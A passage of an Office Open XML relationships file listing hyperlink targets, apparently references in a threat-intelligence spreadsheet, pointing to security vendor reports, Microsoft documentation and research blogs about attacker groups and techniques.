Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msdn.microsoft.com/library/ms679833.aspx" TargetMode="External"/><Relationship Id="rId2701" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.stigviewer.com/stig/microsoft_windows_server_2012_member_server/2013-07-25/finding/WN12-CC-000077" TargetMode="External"/><Relationship Id="rId1303" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://lolbas-project.github.io/lolbas/Binaries/Regasm/" TargetMode="External"/><Relationship Id="rId1510" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.crowdstrike.com/blog/whois-numbered-panda/" TargetMode="External"/><Relationship Id="rId1955" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-finding-holes-operation-emmental.pdf" TargetMode="External"/><Relationship Id="rId1608" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/library/cc771387.aspx" TargetMode="External"/><Relationship Id="rId1815" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msdn.microsoft.com/library/windows/desktop/aa388208.aspx" TargetMode="External"/><Relationship Id="rId3030" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://research.nccgroup.com/2017/08/08/smuggling-hta-files-in-internet-explorer-edge/" TargetMode="External"/><Relationship Id="rId189" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs" TargetMode="External"/><Relationship Id="rId396" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.clearskysec.com/siamesekitten/" TargetMode="External"/><Relationship Id="rId2077" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pypi.org/project/rarfile/" TargetMode="External"/><Relationship Id="rId2284" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.secureworks.com/research/threat-profiles/iron-viking" TargetMode="External"/><Relationship Id="rId2491" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html" TargetMode="External"/><Relationship Id="rId256" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.nth-dimension.org.uk/pub/BTL.pdf" TargetMode="External"/><Relationship Id="rId463" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-january-voodoo-bear/" TargetMode="External"/><Relationship Id="rId670" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/2020/12/02/turla-crutch-keeping-back-door-open/" TargetMode="External"/><Relationship Id="rId1093" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.group-ib.com/whitepapers/ransomware-uncovered.html" TargetMode="External"/><Relationship Id="rId2144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://rewtin.blogspot.ch/2017/11/abusing-user-shares-for-efficient.html" TargetMode="External"/><Relationship Id="rId2351" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/SamSam-ransomware-chooses-Its-targets-carefully-wpna.pdf" TargetMode="External"/><Relationship Id="rId2589" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.timac.org/2012/1218-simple-code-injection-using-dyld_insert_libraries/" TargetMode="External"/><Relationship Id="rId2796" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://unit42.paloaltonetworks.com/bendybear-shellcode-blacktech/" TargetMode="External"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.anomali.com/blog/anomali-suspects-that-china-backed-apt-pirate-panda-may-be-seeking-access-to-vietnam-government-data-center" TargetMode="External"/><Relationship Id="rId323" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://research.checkpoint.com/2021/the-story-of-jian/" TargetMode="External"/><Relationship Id="rId530" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://s7d2.scene7.com/is/content/cylance/prod/cylance-web/en-us/resources/knowledge-center/resource-library/reports/Op_Dust_Storm_Report.pdf" TargetMode="External"/><Relationship Id="rId768" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.eweek.com/security/newscaster-threat-uses-social-media-for-intelligence-gathering" TargetMode="External"/><Relationship Id="rId975" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.symantec.com/connect/blogs/bios-threat-showing-again" TargetMode="External"/><Relationship Id="rId1160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://intel471.com/blog/revil-ransomware-as-a-service-an-analysis-of-a-ransomware-affiliate-operation/" TargetMode="External"/><Relationship Id="rId1398" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/security/blog/2021/12/08/improve-kernel-security-with-the-new-microsoft-vulnerable-and-malicious-driver-reporting-center/" TargetMode="External"/><Relationship Id="rId2004" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://researchcenter.paloaltonetworks.com/2017/02/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/" TargetMode="External"/><Relationship Id="rId2211" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/the-silence/83009/" TargetMode="External"/><Relationship Id="rId2449" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia" TargetMode="External"/><Relationship Id="rId2656" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf" TargetMode="External"/><Relationship Id="rId2863" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Character_encoding" TargetMode="External"/><Relationship Id="rId628" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.docker.com/engine/reference/commandline/exec/" TargetMode="External"/><Relationship Id="rId835" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://files.brucon.org/2015/Tomczak_and_Ballenthin_Shims_for_the_Win.pdf" TargetMode="External"/><Relationship Id="rId1258" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.passware.com/hc/en-us/articles/4573379868567-A-Deep-Dive-into-Apple-Keychain-Decryption" TargetMode="External"/><Relationship Id="rId1465" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securingtomorrow.mcafee.com/mcafee-labs/hidden-cobra-targets-turkish-financial-sector-new-bankshot-implant/" TargetMode="External"/><Relationship Id="rId1672" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=Backdoor:Win32/Lamin.A" TargetMode="External"/><Relationship Id="rId2309" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sentinelone.com/labs/fade-dead-adventures-in-reversing-malicious-run-only-applescripts/" TargetMode="External"/><Relationship Id="rId2516" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/en-us/library/dn487457.aspx" TargetMode="External"/><Relationship Id="rId2723" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.us-cert.gov/ncas/analysis-reports/ar20-045d" TargetMode="External"/><Relationship Id="rId1020" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/True-Demon/raindance" TargetMode="External"/><Relationship Id="rId1118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.hexacorn.com/blog/2017/04/19/beyond-good-ol-run-key-part-62/" TargetMode="External"/><Relationship Id="rId1325" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.crowdstrike.com/blog/lemonduck-botnet-targets-docker-for-cryptomining-operations/" TargetMode="External"/><Relationship Id="rId1532" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal" TargetMode="External"/><Relationship Id="rId1977" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://pwc.blogs.com/cyber_security_updates/2015/07/pirpi-scanbox.html" TargetMode="External"/><Relationship Id="rId2930" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.zscaler.com/blogs/security-research/apt-31-leverages-covid-19-vaccine-theme-and-abuses-legitimate-online" TargetMode="External"/><Relationship Id="rId902" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/revoke-obfuscation-report.pdf" TargetMode="External"/><Relationship Id="rId1837" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-2017" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://arstechnica.com/information-technology/2017/04/researchers-claim-china-trying-to-hack-south-korea-missile-defense-efforts/" TargetMode="External"/><Relationship Id="rId2099" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/" TargetMode="External"/><Relationship Id="rId3052" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://datatracker.ietf.org/doc/html/rfc2131" TargetMode="External"/><Relationship Id="rId180" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion" TargetMode="External"/><Relationship Id="rId278" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://us-cert.cisa.gov/ics/advisories/ICSA-10-272-01" TargetMode="External"/><Relationship Id="rId1904" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.netskope.com/blog/squirrelwaffle-new-malware-loader-delivering-cobalt-strike-and-qakbot" TargetMode="External"/><Relationship Id="rId485" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.crysys.hu/publications/files/skywiper.pdf" TargetMode="External"/><Relationship Id="rId692" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/2021/02/02/kobalos-complex-linux-threat-high-performance-computing-infrastructure/" TargetMode="External"/><Relationship Id="rId2166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sentinelone.com/blog/building-a-custom-tool-for-shellcode-analysis/" TargetMode="External"/><Relationship Id="rId2373" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html" TargetMode="External"/><Relationship Id="rId2580" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/" TargetMode="External"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.apple.com/support/kernel-extensions/" TargetMode="External"/><Relationship Id="rId345" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.chrome.com/extensions" TargetMode="External"/><Relationship Id="rId552" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/" TargetMode="External"/><Relationship Id="rId997" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/peewpw/Invoke-PSImage" TargetMode="External"/><Relationship Id="rId1182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/windows/win32/com/translating-to-jscript" TargetMode="External"/><Relationship Id="rId2026" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.petri.com/setting-up-logon-script-through-active-directory-users-computers-windows-server-2008" TargetMode="External"/><Relationship Id="rId2233" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/why-you-shouldnt-completely-trust-files-signed-with-digital-certificates/68593/" TargetMode="External"/><Relationship Id="rId2440" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine" TargetMode="External"/><Relationship Id="rId2678" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.bleepingcomputer.com/news/security/trickbot-updates-its-vnc-module-for-high-value-targets/" TargetMode="External"/><Relationship Id="rId2885" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Windows_Registry" TargetMode="External"/><Relationship Id="rId205" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.baltimoresun.com/politics/bs-md-ci-it-outage-20190507-story.html" TargetMode="External"/><Relationship Id="rId412" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-application-lateral-movement-technique/" TargetMode="External"/><Relationship Id="rId857" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html" TargetMode="External"/><Relationship Id="rId1042" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Twi1ight/AD-Pentest-Script/blob/master/wmiexec.vbs" TargetMode="External"/><Relationship Id="rId1487" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://arstechnica.com/information-technology/2012/03/the-pwn-plug-is-a-little-white-box-that-can-hack-your-network/" TargetMode="External"/><Relationship Id="rId1694" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.microsoft.com/en-us/help/556003" TargetMode="External"/><Relationship Id="rId2300" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/" TargetMode="External"/><Relationship Id="rId2538" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/library/cc958811.aspx" TargetMode="External"/><Relationship Id="rId2745" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.trendmicro.com/trendlabs-security-intelligence/pokemon-themed-umbreon-linux-rootkit-hits-x86-arm-systems/?_ga=2.180041126.367598458.1505420282-1759340220.1502477046" TargetMode="External"/><Relationship Id="rId2952" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://thehackernews.com/2022/05/avoslocker-ransomware-variant-using-new.html" TargetMode="External"/><Relationship Id="rId717" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.welivesecurity.com/2014/11/11/sednit-espionage-group-attacking-air-gapped-networks/" TargetMode="External"/><Relationship Id="rId924" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2014/03/spear-phishing-the-news-cycle-apt-actors-leverage-interest-in-the-disappearance-of-malaysian-flight-mh-370.html" TargetMode="External"/><Relationship Id="rId1347" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.apple.com/library/archive/samplecode/LoginItemsAE/Introduction/Intro.html" TargetMode="External"/><Relationship Id="rId1554" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/add-users-azure-active-directory" TargetMode="External"/><Relationship Id="rId1761" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msdn.microsoft.com/library/windows/desktop/ms644953.aspx" TargetMode="External"/><Relationship Id="rId1999" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/" TargetMode="External"/><Relationship Id="rId2605" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.trendmicro.com/en_us/research/19/e/infected-cryptocurrency-mining-containers-target-docker-hosts-with-exposed-apis-use-shodan-to-find-additional-victims.html" TargetMode="External"/><Relationship Id="rId2812" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://unit42.paloaltonetworks.com/dear-joohn-sofacy-groups-global-campaign/" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://aws.amazon.com/identity/federation/" TargetMode="External"/><Relationship Id="rId1207" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064518/Carbanak_APT_eng.pdf" TargetMode="External"/><Relationship Id="rId1414" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.malwarebytes.com/threat-analysis/2018/04/new-crossrider-variant-installs-configuration-profiles-on-macs/" TargetMode="External"/><Relationship Id="rId1621" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/previous-versions/fd7hxfdd(v=vs.85)?redirectedfrom=MSDN" TargetMode="External"/><Relationship Id="rId1859" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://research.nccgroup.com/2020/06/02/in-depth-analysis-of-the-new-team9-malware-family/" TargetMode="External"/><Relationship Id="rId3074" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://documents.trendmicro.com/assets/pdf/XCSSET_Technical_Brief.pdf" TargetMode="External"/><Relationship Id="rId1719" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx" TargetMode="External"/><Relationship Id="rId1926" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.netmeister.org/blog/keychain-passwords.html" TargetMode="External"/><Relationship Id="rId2090" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.rsa.com/content/dam/en/white-paper/the-carbanak-fin7-syndicate.pdf" TargetMode="External"/><Relationship Id="rId2188" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ssh.com/ssh" TargetMode="External"/><Relationship Id="rId2395" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.symantec.com/security_response/writeup.jsp?docid=2012-051515-2843-99" TargetMode="External"/><Relationship Id="rId367" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tools.cisco.com/security/center/resources/integrity_assurance.html" TargetMode="External"/><Relationship Id="rId574" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://unit42.paloaltonetworks.com/darkside-ransomware/" TargetMode="External"/><Relationship Id="rId2048" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain" TargetMode="External"/><Relationship Id="rId2255" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/introducing-whitebear/81638/" TargetMode="External"/><Relationship Id="rId3001" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://techcrunch.com/2019/08/12/iphone-charging-cable-hack-computer-def-con/" TargetMode="External"/><Relationship Id="rId227" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/" TargetMode="External"/><Relationship Id="rId781" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.f-secure.com/wp-content/uploads/2019/10/CosmicDuke.pdf" TargetMode="External"/><Relationship Id="rId879" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf" TargetMode="External"/><Relationship Id="rId2462" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://lwn.net/Articles/604515/" TargetMode="External"/><Relationship Id="rId2767" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://researchcenter.paloaltonetworks.com/2017/11/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/" TargetMode="External"/><Relationship Id="rId434" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corero.com/resources/ddos-attack-types/syn-flood-ack.html" TargetMode="External"/><Relationship Id="rId641" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.dragos.com/blog/industry-news/implications-of-it-ransomware-for-ics-environments/" TargetMode="External"/><Relationship Id="rId739" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blogs.technet.microsoft.com/eduardonavarro/2008/07/11/sips-subject-interface-package-and-authenticode/" TargetMode="External"/><Relationship Id="rId1064" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.google.com/compute/docs/disks/restore-and-delete-snapshots" TargetMode="External"/><Relationship Id="rId1271" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://krebsonsecurity.com/2019/08/what-we-can-learn-from-the-capital-one-hack/" TargetMode="External"/><Relationship Id="rId1369" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msdn.microsoft.com/en-us/library/ms649012" TargetMode="External"/><Relationship Id="rId1576" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msdn.microsoft.com/library/ms694363.aspx" TargetMode="External"/><Relationship Id="rId2115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.recordedfuture.com/cobalt-strike-servers/" TargetMode="External"/><Relationship Id="rId2322" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.shadowserver.org/2012/05/15/cyber-espionage-strategic-web-compromises-trusted-websites-serving-dangerous-results/" TargetMode="External"/><Relationship Id="rId2974" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.crowdstrike.com/blog/how-doppelpaymer-hunts-and-kills-windows-processes/" TargetMode="External"/><Relationship Id="rId501" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cybereason.com/hubfs/dam/collateral/reports/11-2020-Chaes-e-commerce-malware-research.pdf" TargetMode="External"/><Relationship Id="rId946" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf" TargetMode="External"/><Relationship Id="rId1131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securityintelligence.com/posts/new-research-exposes-iranian-threat-group-operations/" TargetMode="External"/><Relationship Id="rId1229" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.securelist.com/en/downloads/vlpdfs/kaspersky-the-net-traveler-part1-final.pdf" TargetMode="External"/><Relationship Id="rId1783" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/win32/taskschd/tasks" TargetMode="External"/><Relationship Id="rId1990" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://researchcenter.paloaltonetworks.com/2017/04/unit42-oilrig-actors-provide-glimpse-development-testing-efforts/" TargetMode="External"/><Relationship Id="rId2627" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://documents.trendmicro.com/assets/white_papers/wp-tracking-the-activities-of-teamTNT.pdf" TargetMode="External"/><Relationship Id="rId2834" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html" TargetMode="External"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://adsecurity.org/?p=1640" TargetMode="External"/><Relationship Id="rId806" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/current-threats/apt-groups.html" TargetMode="External"/><Relationship Id="rId1436" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mandiant.com/resources/synful-knock-acis" TargetMode="External"/><Relationship Id="rId1643" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/" TargetMode="External"/><Relationship Id="rId1850" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msitpros.com/?p=3909" TargetMode="External"/><Relationship Id="rId2901" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://modexp.wordpress.com/2019/05/25/windows-injection-finspy/" TargetMode="External"/><Relationship Id="rId3096" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.xorrior.com/emond-persistence/" TargetMode="External"/><Relationship Id="rId1503" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3" TargetMode="External"/><Relationship Id="rId1710" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blogs.msdn.microsoft.com/kebab/2014/04/28/executing-powershell-scripts-from-c/" TargetMode="External"/><Relationship Id="rId1948" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.microsoft.com/en-us/topic/partners-offer-delegated-administration-26530dc0-ebba-415b-86b1-b55bc06b073e?ui=en-us&amp;rs=en-us&amp;ad=us" TargetMode="External"/><Relationship Id="rId291" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b" TargetMode="External"/><Relationship Id="rId1808" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.microsoft.com/help/243330/well-known-security-identifiers-in-windows-operating-systems" TargetMode="External"/><Relationship Id="rId3023" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.bleepingcomputer.com/tutorials/how-malware-hides-as-a-service/" TargetMode="External"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.aquasec.com/container-security-tnt-container-attack" TargetMode="External"/><Relationship Id="rId389" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.clearskysec.com/wp-content/uploads/2020/08/The-Kittens-are-Back-in-Town-3.pdf" TargetMode="External"/><Relationship Id="rId596" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/gentilkiwi/mimikatz/wiki/howto-~-credential-manager-saved-credentials" TargetMode="External"/><Relationship Id="rId2277" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.secureworks.com/research/resurgent-iron-liberty-targeting-energy-sector" TargetMode="External"/><Relationship Id="rId2484" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.talosintelligence.com/2021/11/kimsuky-abuses-blogs-delivers-malware.html" TargetMode="External"/><Relationship Id="rId2691" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/ItsReallyNick/status/958789644165894146" TargetMode="External"/><Relationship Id="rId249" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf" TargetMode="External"/><Relationship Id="rId456" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://adversary.crowdstrike.com/en-US/adversary/ricochet-chollima/" TargetMode="External"/><Relationship Id="rId663" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 